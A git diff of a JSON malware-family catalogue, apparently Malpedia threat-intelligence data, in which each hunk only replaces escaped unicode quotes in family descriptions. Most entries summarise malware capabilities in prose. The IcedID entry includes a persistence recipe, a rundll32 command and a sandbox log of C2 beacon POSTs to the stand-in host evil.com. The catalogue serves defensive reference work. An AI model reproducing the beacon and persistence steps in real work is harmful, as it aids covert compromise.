@@ -23026,7 +23026,7 @@ "value": "DMSniff" }, { - "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a \u201cpolicy\u201d file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", + "description": "DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy", 
@@ -23904,7 +23904,7 @@ "value": "DuQu" }, { - "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim\u2019s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", + "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman", 
@@ -24045,7 +24045,7 @@ "value": "EDA2" }, { - "description": "According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim\u2019s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim\u2019s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named \u201cRECOVER-FILES.txt\u201d in all the compromised folders. ", + "description": "According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim’s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim’s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named “RECOVER-FILES.txt” in all the compromised folders. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor", @@ -24910,7 +24910,7 @@ "value": "EternalRocks" }, { - "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims\u2019 computers, servers, or files preventing them from regaining access until a ransom\u2014usually in Bitcoin\u2014is paid.\r\n\r\n", + "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims’ computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", 
@@ -25150,7 +25150,7 @@ "value": "EVILNUM (Windows)" }, { - "description": "A wiper used against in an attack against Iran\u2019s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.", + "description": "A wiper used against in an attack against Iran’s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilplayout", @@ -25685,7 +25685,7 @@ "value": "FFDroider" }, { - "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we\u2019ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.", + "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer", 
@@ -25936,7 +25936,7 @@ "value": "FiveHands" }, { - "description": "According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim\u2019s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:\r\n\r\nDownload and execute a tool\r\nExecute OS commands and send results\r\nCollect and send Windows authentication information", + "description": "According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim’s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:\r\n\r\nDownload and execute a tool\r\nExecute OS commands and send results\r\nCollect and send Windows authentication information", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro", 
@@ -26508,7 +26508,7 @@ "value": "FusionDrive" }, { - "description": "FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.\r\n\r\nIt contains two distinguishing hardcoded lists.\r\n\r\nFirst is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012). \r\n\r\nSecond is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.\r\n\r\nFuwuqiDrama stores its configuration in the INI file data\\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi \u2013 the romanized Chinese word for server.\r\n", + "description": "FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.\r\n\r\nIt contains two distinguishing hardcoded lists.\r\n\r\nFirst is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012). 
\r\n\r\nSecond is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.\r\n\r\nFuwuqiDrama stores its configuration in the INI file data\\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi – the romanized Chinese word for server.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama", 
@@ -26645,7 +26645,7 @@ "value": "Gamotrol" }, { - "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab\u2019s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there\u2019s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", + "description": "GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.\r\n\r\nIn a surprising announcement on May 31, 2019, the GandCrab’s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", 
@@ -27074,7 +27074,7 @@ "value": "GhostAdmin" }, { - "description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan \u201cRemote Access Tool\u201d used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.", + "description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", 
@@ -27534,7 +27534,7 @@ "value": "GoldenHelper" }, { - "description": "According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.\r\n\r\nOne of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing \u201cIntelligent Tax,\u201d a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.\r\n\r\nAlthough it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.", + "description": "According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.\r\n\r\nOne of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing “Intelligent Tax,” a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.\r\n\r\nAlthough it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy", 
@@ -27579,7 +27579,7 @@ "value": "GoldMax" }, { - "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim\u2019s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", + "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", 
@@ -27964,7 +27964,7 @@ "value": "GraphicalNeutrino" }, { - "description": "According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican\u2019s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.", + "description": "According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican’s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican", 
@@ -28043,7 +28043,7 @@
 "value": "GraphSteel"
 },
 {
- "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
+ "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos",
@@ -29787,7 +29787,7 @@
 "value": "Icarus"
 },
 {
- "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
+ "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid",
@@ -30026,7 +30026,7 @@
 "value": "win.icexloader"
 },
 {
- "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus\u2019s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.",
+ "description": "The ICE IX bot is a banking trojan derived of the Zeus botnet because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered to be a third-generation botnet. While it has been used for a variety of purposes, a primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix",
@@ -30087,7 +30087,7 @@
 "value": "IcyHeart"
 },
 {
- "description": "According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelg\u00e4nging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.",
+ "description": "According to Rapid7, this is a loader first spotted in July 2023. It implements several evasion techniques including Process Doppelgänging, DLL Search Order Hijacking, and Heaven's Gate. IDAT loader got its name as the threat actor stores the malicious payload in the IDAT chunk of PNG file format.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.idat_loader",
@@ -30248,7 +30248,7 @@
 "value": "Industrial Spy"
 },
 {
- "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine\u2019s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.",
+ "description": "Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer",
@@ -30480,7 +30480,7 @@
 "value": "Ironcat"
 },
 {
- "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.",
+ "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo",
@@ -30509,7 +30509,7 @@
 "value": "IronNetInjector"
 },
 {
- "description": "According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim\u2019s machine.",
+ "description": "According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim’s machine.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper",
@@ -30877,7 +30877,7 @@
 "value": "Janeleiro"
 },
 {
- "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to \u201charvest\u201d the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.",
+ "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jason",
@@ -30936,7 +30936,7 @@
 "value": "Jeno"
 },
 {
- "description": "JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker\u2019s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.\r\n\r\nThe malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.\r\n\r\nJessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol \".?AVCHttpConn@@\", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.\r\n",
+ "description": "JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.\r\n\r\nThe malware was delivered in-the-wild via trojanized applications like DeFi Wallet or Citrix Workspace.\r\n\r\nJessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol \".?AVCHttpConn@@\", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea",
@@ -31584,7 +31584,7 @@
 "value": "Khonsari"
 },
 {
- "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine\u2019s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.",
+ "description": "According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat",
@@ -31631,7 +31631,7 @@
 "value": "KillAV"
 },
 {
- "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many \u201csub-families\u201d, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ",
+ "description": "KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities, are sometimes seen in separate cyberattacks and thus can help researchers make connections between them. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk",
@@ -32320,7 +32320,7 @@
 "value": "LaplasClipper"
 },
 {
- "description": "FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.\r\n\r\nUsing Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland \u2013 primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped \u2013 which they named LATENTBOT \u2013 caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.",
